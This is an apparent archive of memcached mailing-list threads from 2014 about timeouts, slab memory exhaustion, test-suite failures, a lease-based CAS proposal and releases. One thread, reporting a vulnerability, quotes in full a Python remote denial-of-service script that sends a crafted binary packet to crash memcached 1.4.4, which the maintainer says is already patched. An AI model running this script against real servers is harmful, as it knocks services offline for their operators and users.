either that always happened and we never noticed, or your particular OS is corrupt. There're probably 10,000+ installs of .18+ now and only one complaint, so I'm a little hesitant to spend a ton of time on this until we get more reports. You should downgrade to .17. On Sun, 4 May 2014, notifi...@commando.io wrote: Damn it, got network timeout. CPU 3 is using 100% cpu from memcached. Here is the result of stat to verify using new version of memcached and libevent: STAT version 1.4.19 STAT libevent 2.0.18-stable On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io wrote: Just upgraded all 5 web-servers to memcached 1.4.19 with libevent 2.0.18. Will advise if I see memcached timeouts. Should be good though. Thanks so much for all the help and patience. Really appreciated. On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com wrote: Updates: Status: Invalid Comment #20 on issue 363 by dorma...@rydia.net: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notificati...@commando.io wrote: I'm going to try switching threads from 4 to 1. This host web2 is on the only one I am seeing it on, but it also is the only hosts that gets any real traffic. Super frustrating. On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote: I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. Though again, if it happened with any frequency people's curr_conns stat would go negative. So... either that always happened and we never noticed, or your particular OS is corrupt. There're probably 10,000+ installs of .18+ now and only one complaint, so I'm a little hesitant to spend a ton of time on this until we get more reports. You should downgrade to .17. On Sun, 4 May 2014, notifi...@commando.io wrote: Damn it, got network timeout. CPU 3 is using 100% cpu from memcached. Here is the result of stat to verify using new version of memcached and libevent: STAT version 1.4.19 STAT libevent 2.0.18-stable On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io wrote: Just upgraded all 5 web-servers to memcached 1.4.19 with libevent 2.0.18. Will advise if I see memcached timeouts. Should be good though. Thanks so much for all the help and patience. Really appreciated. On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com wrote: Updates: Status: Invalid Comment #20 on issue 363 by dorma...@rydia.net: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout http://code.google.com/p/memcached/issues/detail?id=363 Any repeat crashes? I'm going to close this. it looks like remi shipped .19. reopen or open a new one if it hangs in the same way somehow... Well. 19 won't be printing anything, and it won't hang, but if it's actually our bug and not libevent it would end up spinning CPU. Keep an eye out I guess. -- You received this message because this project is configured to send all issue notifications to this address. You may adjust your notification preferences at: https://code.google.com/hosting/settings -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error
Hi, Does anybody know good way to handle OOM during set operation? Server is fully calcified :) (no new pages to allocate) and i have this issue for slab 17 STAT items:17:number 16128 STAT items:17:age 90 STAT items:17:evicted 246790897 STAT items:17:evicted_nonzero 246790874 STAT items:17:evicted_time 90 STAT items:17:outofmemory 33098 STAT items:17:tailrepairs 0 STAT items:17:reclaimed 1183 STAT items:17:expired_unfetched 196 STAT items:17:evicted_unfetched 143699820 running memcached : STAT version 1.4.15 stats slabs ? Is memory unbalanced from other slabs? nothing except reboot periodically comes to my mind but this solution does not make me happy :) There's the slab rebalance feature. OOM errors only happen when there is truly very few pages free and all of the ones in the tail are locked, or there's a bug. It should always evict. The rebalance feature is documented in doc/protocol.txt. However your eviction seems to be very highly pressured. The evicted_unfetched stat is high compared to the tota number of evictions. So they're not even staying in long enough to get fetched again. There aren't that many OOM errors overall, so perhaps you are just hitting that slab way too hard and occasionally locking everything in the tail. You either need to add more memory to the total system or rebalance them. other option - enable compression to allow more items but need to experiment (why memcached does not provide server side compression? as i see in stats memcached cpu is not used, so would be good to utilize it.) Very high rate of access is expected and the ratio of clients to servers might be high, so compression is done in the client instead. It was also designed to let you run it wherever there's free memory (extra installed in webservers/etc) so it wants to avoid excess cpu usage. It's a trivial switch either way. Also consider upgrading to .17 or .19. might be some good fixes. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error
Hi Dormando, Full Slabs and Items stats are below. The problem is that other slabs are full too, so rebalancing is not trivial. I will try to create a wrapper that will do some analysis and do slab rebalancing based on stats (the idea to move try to shrink slabs with low eviction but need to think more). But i see there is Slabs Automove in protocol.txt. Do you recommend it? If it fits your needs. Otherwise, write an external daemon that controls the automover based on your own needs. You either need to add more memory to the total system or rebalance them. we run many-many memcached servers with 30Gb+ memory each box. And the problem occurs on some boxes periodically. So I am thinking how to convert manual restart to automatic action. I'm not sure why restarting will fix it, if above you say rebalancing is not trivial. If restarting would fix it, rebalancing would also fix it. From the stats below, you do have a fair amount of memory spread out among the higher order slab classes. Compression, or otherwise re-evaluating how you store those values may make a big difference. There's also a huge amount of stuff being evicted without ever being fetched again. Are you caching too aggressively, or is memory just way too small and they never get a chance to be fetched after being set? I'm just eyeballing it but evicted_time seems pretty short (a matter of hours). That's the last access time of the last object to be evicted... and it's like that across most of your slab classes. So, shuffle and compress and whatnot, but I think you're out of ram dude. server stats STAT pid 15480 STAT uptime 2476264 STAT time 1399422427 STAT version 1.4.15 STAT libevent 1.4.13-stable STAT pointer_size 64 STAT rusage_user 639012.117392 STAT rusage_system 2076810.323840 STAT curr_connections 5237 STAT total_connections 122995977 STAT connection_structures 23402 STAT reserved_fds 40 STAT cmd_get 91928675147 STAT cmd_set 4358475896 STAT cmd_flush 1 STAT cmd_touch 0 STAT get_hits 85005900667 STAT get_misses 6922774480 STAT delete_misses 4238049567 STAT delete_hits 885535057 STAT incr_misses 0 STAT incr_hits 0 STAT decr_misses 0 STAT decr_hits 0 STAT cas_misses 1074 STAT cas_hits 4784930 STAT cas_badval 14966 STAT touch_hits 0 STAT touch_misses 0 STAT auth_cmds 0 STAT auth_errors 0 STAT bytes_read 32317259718167 STAT bytes_written 221039272582722 STAT limit_maxbytes 25769803776 STAT accepting_conns 1 STAT listen_disabled_num 0 STAT threads 8 STAT conn_yields 0 STAT hash_power_level 25 STAT hash_bytes 268435456 STAT hash_is_expanding 0 STAT slab_reassign_running 0 STAT slabs_moved 0 STAT bytes 23567307974 STAT curr_items 32559669 STAT total_items 61290586 STAT expired_unfetched 6664504 STAT evicted_unfetched 1244432758 STAT evictions 2522683859 STAT reclaimed 7626148 END stats slabs STAT 1:chunk_size 96 STAT 1:chunks_per_page 10922 STAT 1:total_pages 1 STAT 1:total_chunks 10922 STAT 1:used_chunks 0 STAT 1:free_chunks 10922 STAT 1:free_chunks_end 0 STAT 1:mem_requested 0 STAT 1:get_hits 9905 STAT 1:cmd_set 10362 STAT 1:delete_hits 9582 STAT 1:incr_hits 0 STAT 1:decr_hits 0 STAT 1:cas_hits 0 STAT 1:cas_badval 0 STAT 1:touch_hits 0 STAT 2:chunk_size 120 STAT 2:chunks_per_page 8738 STAT 2:total_pages 1 STAT 2:total_chunks 8738 STAT 2:used_chunks 13 STAT 2:free_chunks 8725 STAT 2:free_chunks_end 0 STAT 2:mem_requested 1350 STAT 2:get_hits 1309125 STAT 2:cmd_set 2963710 STAT 2:delete_hits 199018 STAT 2:incr_hits 0 STAT 2:decr_hits 0 STAT 2:cas_hits 770681 STAT 2:cas_badval 3697 STAT 2:touch_hits 0 STAT 3:chunk_size 152 STAT 3:chunks_per_page 6898 STAT 3:total_pages 5 STAT 3:total_chunks 34490 STAT 3:used_chunks 34240 STAT 3:free_chunks 250 STAT 3:free_chunks_end 0 STAT 3:mem_requested 483 STAT 3:get_hits 2088979 STAT 3:cmd_set 4355223 STAT 3:delete_hits 3392 STAT 3:incr_hits 0 STAT 3:decr_hits 0 STAT 3:cas_hits 0 STAT 3:cas_badval 0 STAT 3:touch_hits 0 STAT 4:chunk_size 192 STAT 4:chunks_per_page 5461 STAT 4:total_pages 11 STAT 4:total_chunks 60071 STAT 4:used_chunks 60070 STAT 4:free_chunks 1 STAT 4:free_chunks_end 0 STAT 4:mem_requested 10821971 STAT 4:get_hits 65413752 STAT 4:cmd_set 22935889 STAT 4:delete_hits 6028 STAT 4:incr_hits 0 STAT 4:decr_hits 0 STAT 4:cas_hits 0 STAT 4:cas_badval 0 STAT 4:touch_hits 0 STAT 5:chunk_size 240 STAT 5:chunks_per_page 4369 STAT 5:total_pages 756 STAT 5:total_chunks 3302964 STAT 5:used_chunks 3302964 STAT 5:free_chunks 0 STAT 5:free_chunks_end 0 STAT 5:mem_requested 766866823 STAT 5:get_hits 2762768607 STAT 5:cmd_set 445418784 STAT 5:delete_hits 15806705 STAT 5:incr_hits 0 STAT 5:decr_hits 0 STAT 5:cas_hits 0 STAT 5:cas_badval 0 STAT 5:touch_hits 0 STAT 6:chunk_size 304 STAT 6:chunks_per_page 3449 STAT 6:total_pages 2304 STAT 6:total_chunks 7946496 STAT 6:used_chunks 7946496 STAT 6:free_chunks 0 STAT 6:free_chunks_end 0 STAT 6
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. Though again, if it happened with any frequency people's curr_conns stat would go negative. So... either that always happened and we never noticed, or your particular OS is corrupt. There're probably 10,000+ installs of .18+ now and only one complaint, so I'm a little hesitant to spend a ton of time on this until we get more reports. You should downgrade to .17. On Sun, 4 May 2014, notificati...@commando.io wrote: Damn it, got network timeout. CPU 3 is using 100% cpu from memcached. Here is the result of stat to verify using new version of memcached and libevent: STAT version 1.4.19 STAT libevent 2.0.18-stable On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io wrote: Just upgraded all 5 web-servers to memcached 1.4.19 with libevent 2.0.18. Will advise if I see memcached timeouts. Should be good though. Thanks so much for all the help and patience. Really appreciated. On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com wrote: Updates: Status: Invalid Comment #20 on issue 363 by dorma...@rydia.net: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout http://code.google.com/p/memcached/issues/detail?id=363 Any repeat crashes? I'm going to close this. it looks like remi shipped .19. reopen or open a new one if it hangs in the same way somehow... Well. 19 won't be printing anything, and it won't hang, but if it's actually our bug and not libevent it would end up spinning CPU. Keep an eye out I guess. -- You received this message because this project is configured to send all issue notifications to this address. You may adjust your notification preferences at: https://code.google.com/hosting/settings -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
1.4.19
http://code.google.com/p/memcached/wiki/ReleaseNotes1419 Thanks to everyone who helped out with the bugfixes for this release. Don't want to get my hopes up but I think we're finally running out of segfaults and refcount leaks (until we go changing more stuff again..). -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached 1.4.19 Build Not Working - Compiling from Source
What's the output of: $ prove -v t/lru-crawler.t How long are the tests taking to run? This has definitely been tested on ubuntu 12.04 (which is what I assume you meant?), but not something with so little RAM. On Thu, 1 May 2014, Wilfred Khalik wrote: Hi guys, I get the below failure error when I run the make test command: Any help would be appreciated.I am running this on 512MB Digital Ocean VPS by the way on Linux 12.0.4.4 LTS. Slab Stats 64 Thread stats 200 Global stats 208 Settings 124 Item (no cas) 32 Item (cas) 40 Libevent thread 100 Connection 340 libevent thread cumulative 13100 Thread stats cumulative 13000 ./testapp 1..48 ok 1 - cache_create ok 2 - cache_constructor ok 3 - cache_constructor_fail ok 4 - cache_destructor ok 5 - cache_reuse ok 6 - cache_redzone ok 7 - issue_161 ok 8 - strtol ok 9 - strtoll ok 10 - strtoul ok 11 - strtoull ok 12 - issue_44 ok 13 - vperror ok 14 - issue_101 ok 15 - start_server ok 16 - issue_92 ok 17 - issue_102 ok 18 - binary_noop ok 19 - binary_quit ok 20 - binary_quitq ok 21 - binary_set ok 22 - binary_setq ok 23 - binary_add ok 24 - binary_addq ok 25 - binary_replace ok 26 - binary_replaceq ok 27 - binary_delete ok 28 - binary_deleteq ok 29 - binary_get ok 30 - binary_getq ok 31 - binary_getk ok 32 - binary_getkq ok 33 - binary_incr ok 34 - binary_incrq ok 35 - binary_decr ok 36 - binary_decrq ok 37 - binary_version ok 38 - binary_flush ok 39 - binary_flushq ok 40 - binary_append ok 41 - binary_appendq ok 42 - binary_prepend ok 43 - binary_prependq ok 44 - binary_stat ok 45 - binary_illegal ok 46 - binary_pipeline_hickup SIGINT handled. ok 47 - shutdown ok 48 - stop_server prove ./t t/00-startup.t ... 1/18 getaddrinfo(): Name or service not known failed to listen on TCP port 38181: Success t/00-startup.t ... 13/18 slab class 1: chunk size 80 perslab 13107 slab class 2: chunk size 104 perslab 10082 slab class 3: chunk size 136 perslab 7710 slab class 4: chunk size 176 perslab 5957 slab class 5: chunk size 224 perslab 4681 slab class 6: chunk size 280 perslab 3744 slab class 7: chunk size 352 perslab 2978 slab class 8: chunk size 440 perslab 2383 slab class 9: chunk size 552 perslab 1899 slab class 10: chunk size 696 perslab 1506 slab class 11: chunk size 872 perslab 1202 slab class 12: chunk size 1096 perslab 956 slab class 13: chunk size 1376 perslab 762 slab class 14: chunk size 1720 perslab 609 slab class 15: chunk size 2152 perslab 487 slab class 16: chunk size 2696 perslab 388 slab class 17: chunk size 3376 perslab 310 slab class 18: chunk size 4224 perslab 248 slab class 19: chunk size 5280 perslab 198 slab class 20: chunk size 6600 perslab 158 slab class 21: chunk size 8256 perslab 127 slab class 22: chunk size 10320 perslab 101 slab class 23: chunk size 12904 perslab 81 slab class 24: chunk size 16136 perslab 64 slab class 25: chunk size 20176 perslab 51 slab class 26: chunk size 25224 perslab 41 slab class 27: chunk size 31536 perslab 33 slab class 28: chunk size 39424 perslab 26 slab class 29: chunk size 49280 perslab 21 slab class 30: chunk size 61600 perslab 17 slab class 31: chunk size 77000 perslab 13 slab class 32: chunk size 96256 perslab 10 slab class 33: chunk size 120320 perslab 8 slab class 34: chunk size 150400 perslab 6 slab class 35: chunk size 188000 perslab 5 slab class 36: chunk size 235000 perslab 4 slab class 37: chunk size 293752 perslab 3 slab class 38: chunk size 367192 perslab 2 slab class 39: chunk size 458992 perslab 2 slab class 40: chunk size 573744 perslab 1 slab class 41: chunk size 717184 perslab 1 slab class 42: chunk size 1048576 perslab 1 26 server listening (auto-negotiate) 27 server listening (auto-negotiate) 28 send buffer was 180224, now 268435456 32 send buffer was 180224, now 268435456 31 server listening (udp) 35 server listening (udp) 30 server listening (udp) 34 server listening (udp) 29 server listening (udp) 33 server listening (udp) 28 server listening (udp) 32 server listening (udp) slab class 1: chunk size 80 perslab 13107 slab class 2: chunk size 104 perslab 10082 slab class 3: chunk size 136 perslab 7710 slab class 4: chunk size 176 perslab 5957 slab class 5: chunk size 224 perslab 4681 slab class 6: chunk size 280 perslab 3744 slab class 7: chunk size 352 perslab 2978 slab class 8: chunk size 440 perslab 2383 slab
Re: Memcached 1.4.19 Build Not Working - Compiling from Source
I don't know. I need to see the output of that program. On Thu, 1 May 2014, Wilfred Khalik wrote: By the way, how RAM is enough RAM? On Friday, May 2, 2014 1:28:57 PM UTC+12, Dormando wrote: What's the output of: $ prove -v t/lru-crawler.t How long are the tests taking to run? This has definitely been tested on ubuntu 12.04 (which is what I assume you meant?), but not something with so little RAM. On Thu, 1 May 2014, Wilfred Khalik wrote: Hi guys, I get the below failure error when I run the make test command: Any help would be appreciated.I am running this on 512MB Digital Ocean VPS by the way on Linux 12.0.4.4 LTS. Slab Stats 64 Thread stats 200 Global stats 208 Settings 124 Item (no cas) 32 Item (cas) 40 Libevent thread 100 Connection 340 libevent thread cumulative 13100 Thread stats cumulative 13000 ./testapp 1..48 ok 1 - cache_create ok 2 - cache_constructor ok 3 - cache_constructor_fail ok 4 - cache_destructor ok 5 - cache_reuse ok 6 - cache_redzone ok 7 - issue_161 ok 8 - strtol ok 9 - strtoll ok 10 - strtoul ok 11 - strtoull ok 12 - issue_44 ok 13 - vperror ok 14 - issue_101 ok 15 - start_server ok 16 - issue_92 ok 17 - issue_102 ok 18 - binary_noop ok 19 - binary_quit ok 20 - binary_quitq ok 21 - binary_set ok 22 - binary_setq ok 23 - binary_add ok 24 - binary_addq ok 25 - binary_replace ok 26 - binary_replaceq ok 27 - binary_delete ok 28 - binary_deleteq ok 29 - binary_get ok 30 - binary_getq ok 31 - binary_getk ok 32 - binary_getkq ok 33 - binary_incr ok 34 - binary_incrq ok 35 - binary_decr ok 36 - binary_decrq ok 37 - binary_version ok 38 - binary_flush ok 39 - binary_flushq ok 40 - binary_append ok 41 - binary_appendq ok 42 - binary_prepend ok 43 - binary_prependq ok 44 - binary_stat ok 45 - binary_illegal ok 46 - binary_pipeline_hickup SIGINT handled. ok 47 - shutdown ok 48 - stop_server prove ./t t/00-startup.t ... 1/18 getaddrinfo(): Name or service not known failed to listen on TCP port 38181: Success t/00-startup.t ... 13/18 slab class 1: chunk size 80 perslab 13107 slab class 2: chunk size 104 perslab 10082 slab class 3: chunk size 136 perslab 7710 slab class 4: chunk size 176 perslab 5957 slab class 5: chunk size 224 perslab 4681 slab class 6: chunk size 280 perslab 3744 slab class 7: chunk size 352 perslab 2978 slab class 8: chunk size 440 perslab 2383 slab class 9: chunk size 552 perslab 1899 slab class 10: chunk size 696 perslab 1506 slab class 11: chunk size 872 perslab 1202 slab class 12: chunk size 1096 perslab 956 slab class 13: chunk size 1376 perslab 762 slab class 14: chunk size 1720 perslab 609 slab class 15: chunk size 2152 perslab 487 slab class 16: chunk size 2696 perslab 388 slab class 17: chunk size 3376 perslab 310 slab class 18: chunk size 4224 perslab 248 slab class 19: chunk size 5280 perslab 198 slab class 20: chunk size 6600 perslab 158 slab class 21: chunk size 8256 perslab 127 slab class 22: chunk size 10320 perslab 101 slab class 23: chunk size 12904 perslab 81 slab class 24: chunk size 16136 perslab 64 slab class 25: chunk size 20176 perslab 51 slab class 26: chunk size 25224 perslab 41 slab class 27: chunk size 31536 perslab 33 slab class 28: chunk size 39424 perslab 26 slab class 29: chunk size 49280 perslab 21 slab class 30: chunk size 61600 perslab 17 slab class 31: chunk size 77000 perslab 13 slab class 32: chunk size 96256 perslab 10 slab class 33: chunk size 120320 perslab 8 slab class 34: chunk size 150400 perslab 6 slab class 35: chunk size 188000 perslab 5 slab class 36: chunk size 235000 perslab 4 slab class 37: chunk size 293752 perslab 3 slab class 38: chunk size 367192 perslab 2 slab class 39: chunk
Re: Java memcached timeout
http://memcached.org/timeouts also, you haven't said what version you're on of memcached? or provided stats, or etc... On Fri, 25 Apr 2014, Filippe Costa Spolti wrote: Helle guys, Anyone already had a problem similar to this: Caused by: java.util.concurrent.ExecutionException: net.spy.memcached.internal.CheckedOperationTimeoutException: Operation timed out. - failing node: localhost/127.0.0.1:11211 at net.spy.memcached.internal.OperationFuture.get(OperationFuture.java:106) [spymemcached-2.8.1.jar:2.8.1] at net.spy.memcached.internal.GetFuture.get(GetFuture.java:62) [spymemcached-2.8.1.jar:2.8.1] at net.spy.memcached.MemcachedClient.get(MemcachedClient.java:997) [spymemcached-2.8.1.jar:2.8.1] ... 80 more Caused by: net.spy.memcached.internal.CheckedOperationTimeoutException: Operation timed out. - failing node: localhost/127.0.0.1:11211 ? it's happening everyday here.. A new version can fix it? -- Regards, __ Filippe Costa Spolti Linux User n°515639 - http://counter.li.org/ filippespo...@gmail.com Be yourself [IMAGE] -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached vulnerabilitie
what version are you testing? On Wed, 23 Apr 2014, Filippe Costa Spolti wrote: Hello everyone. THis python script crash the memcached. import sys import socket print Memcached Remote DoS - Bursting Clouds yo! if len(sys.argv) != 3: print Usage: %s host port %(sys.argv[0]) sys.exit(1) target = sys.argv[1] port = sys.argv[2] print [+] Target Host: %s %(target) print [+] Target Port: %s %(port) kill = \x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff kill +=\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 kill +=\x00\xff\xff\xff\xff\x01\x00\x00\0xabad1dea hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) try: hax.connect((target, int(port))) print [+] Connected, firing payload! except: print [-] Connection Failed... Is there even a target? sys.exit(1) try: hax.send(kill) print [+] Payload Sent! except: print [-] Payload Sending Failure... WTF? sys.exit(1) hax.close() print [*] Should be dead... -- Regards, __ Filippe Costa Spolti Linux User n°515639 - http://counter.li.org/ filippespo...@gmail.com Be yourself [IMAGE] -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached vulnerabilitie
can you... try against a version that isn't four years old? we patched something similar to this a while back. On Wed, 23 Apr 2014, Filippe Costa Spolti wrote: memcached 1.4.4 Regards, __ Filippe Costa Spolti Linux User n°515639 - http://counter.li.org/ filippespo...@gmail.com Be yourself [IMAGE] On 04/23/2014 06:24 PM, dormando wrote: what version are you testing? On Wed, 23 Apr 2014, Filippe Costa Spolti wrote: Hello everyone. THis python script crash the memcached. import sys import socket print Memcached Remote DoS - Bursting Clouds yo! if len(sys.argv) != 3: print Usage: %s host port %(sys.argv[0]) sys.exit(1) target = sys.argv[1] port = sys.argv[2] print [+] Target Host: %s %(target) print [+] Target Port: %s %(port) kill = \x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff kill +=\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 kill +=\x00\xff\xff\xff\xff\x01\x00\x00\0xabad1dea hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) try: hax.connect((target, int(port))) print [+] Connected, firing payload! except: print [-] Connection Failed... Is there even a target? sys.exit(1) try: hax.send(kill) print [+] Payload Sent! except: print [-] Payload Sending Failure... WTF? sys.exit(1) hax.close() print [*] Should be dead... -- Regards, __ Filippe Costa Spolti Linux User n°515639 - http://counter.li.org/ filippespo...@gmail.com Be yourself [IMAGE] -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Add a feature 'strong cas', developed from 'lease' that mentioned in Facebook's paper
Well I haven't read the lease paper yet. Ryan, can folks more familiar with the actual implementation have a look through it maybe? On Thu, 17 Apr 2014, Zhiwei Chan wrote: I m working on a trading system, and getting stale data for the system is unaccepted at most of the time. But the high throughput make it impossible to get all data from mysql. So i want to make it more reliable when use memcache as a cache. Facebook's paper Scaling Memcache at Facebook mentions a method called ‘lease' and 'mcsqueal', but the mcsqueal is difficult for my case, because it is hard to get the key for mysql. Adding the 'strong cas' feature is devoted to solve the following typical problems, client A and Client B want to update the same key, and A(set key=1)update database before B(set key=2): key not exist in cache: (A get-miss)-(B get-miss)-(B set key=2) - (A set key=1); or key exist in cache: (A delete key)-(B delete key)-(B set key=2) - (A set key=1); Some thing Wrong! the key=2 in database but key=1 in cache. It is possible to happen in a high concurrent system, and i don't find a way to solve it with the current cas method. So i add two command 'getss' and 'deletess', they will create a lease and return a cas-unique, or tell the client there already exist lease on the server. the client can do something to prevent stale data. such as wait, or invalidate the pre-lease. I also think the lease is a concept of 'dirty lock', because anybody try to update it will replace itself expiration to the lease's expiration(the lease's expiration time should be very short), so in the worst case(low probability), the stale data only exist in cache for a short time. It is accepted for most app in my case. For more detail information, please read doc/strongcas.txt. And hoping for u guys suggestion ~_~ i have created a pull request on github. https://github.com/memcached/memcached/pull/65 -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: 1.4.18
Well, that learns me for trying to write software without the 10+ VM buildbots... The i386 one, can you include the output of stats settings, and also manually run: lru_crawler enable (or start with -o lru_crawler) then run stats settings again please? Really weird that it fails there, but not the lines before it looking for the OK while enabling it. On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39 from 3 to 8 and try again? I was trying to be clever but that may not be working out. Thanks! At least there're still people trying to maintain it for some distros... On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote: http://code.google.com/p/memcached/wiki/ReleaseNotes1418 I just tried building the Arch Linux package for this and got failures when running the test suite. This was the output from the 32-bit i686 build; I saw the same results building for x86_64. Let me know what other relevant information might help. # Failed test at t/lru-crawler.t line 45. # got: undef # expected: 'yes' t/lru-crawler.t .. Failed 96/189 subtests t/lru.t .. ok t/maxconns.t . ok t/multiversioning.t .. ok t/noreply.t .. ok t/slabs_reassign.t ... ok t/stats-conns.t .. ok t/stats-detail.t . ok t/stats.t ok t/touch.t ok t/udp.t .. ok t/unixsocket.t ... ok t/whitespace.t ... skipped: Skipping tests probably because you don't have git. Test Summary Report --- t/lru-crawler.t (Wstat: 13 Tests: 94 Failed: 1) Failed test: 94 Non-zero wait status: 13 Parse errors: Bad plan. You planned 189 tests but ran 94. Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr 0.05 sys + 2.27 cusr 0.35 csys = 3.43 CPU) Result: FAIL Makefile:1376: recipe for target 'test' failed make: *** [test] Error 1 == ERROR: A failure occurred in check(). Aborting... Running out of a git checkout on x86_64, I get slightly different results: t/item_size_max.t ok t/line-lengths.t . ok t/lru-crawler.t .. 93/189 # Failed test 'slab1 now has 60 used chunks' # at t/lru-crawler.t line 57. # got: '90' # expected: '60' # Failed test 'slab1 has 30 reclaims' # at t/lru-crawler.t line 59. # got: '0' # expected: '30' # Looks like you failed 2 tests of 189. t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200) Failed 2/189 subtests t/lru.t .. ok t/maxconns.t . ok t/multiversioning.t .. ok t/noreply.t .. ok t/slabs_reassign.t ... ok t/stats-conns.t .. ok t/stats-detail.t . ok t/stats.t ok t/touch.t ok t/udp.t .. ok t/unixsocket.t ... ok t/whitespace.t ... 1/120 # Failed test '0001-Support-V-version-option.patch (see devtools/clean-whitespace.pl)' # at t/whitespace.t line 40. t/whitespace.t ... 27/120 # Looks like you failed 1 test of 120. t/whitespace.t ... Dubious, test returned 1 (wstat 256, 0x100) Failed 1/120 subtests Test Summary Report --- t/lru-crawler.t (Wstat: 512 Tests: 189 Failed: 2) Failed tests: 96-97 Non-zero exit status: 2 t/whitespace.t (Wstat: 256 Tests: 120 Failed: 1) Failed test: 1 Non-zero exit status: 1 Files=48, Tests=7193, 115 wallclock secs ( 1.39 usr 0.15 sys + 5.39 cusr 1.02 csys = 7.95 CPU) Result: FAIL Makefile:1482: recipe for target 'test' failed make: *** [test] Error 1 $ git describe 1.4.18 $ uname -a Linux galway 3.14.1-1-ARCH #1 SMP PREEMPT Mon Apr 14 20:40:47 CEST 2014 x86_64 GNU/Linux $ gcc --version gcc (GCC) 4.8.2 20140206 (prerelease) Copyright (C) 2013 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop 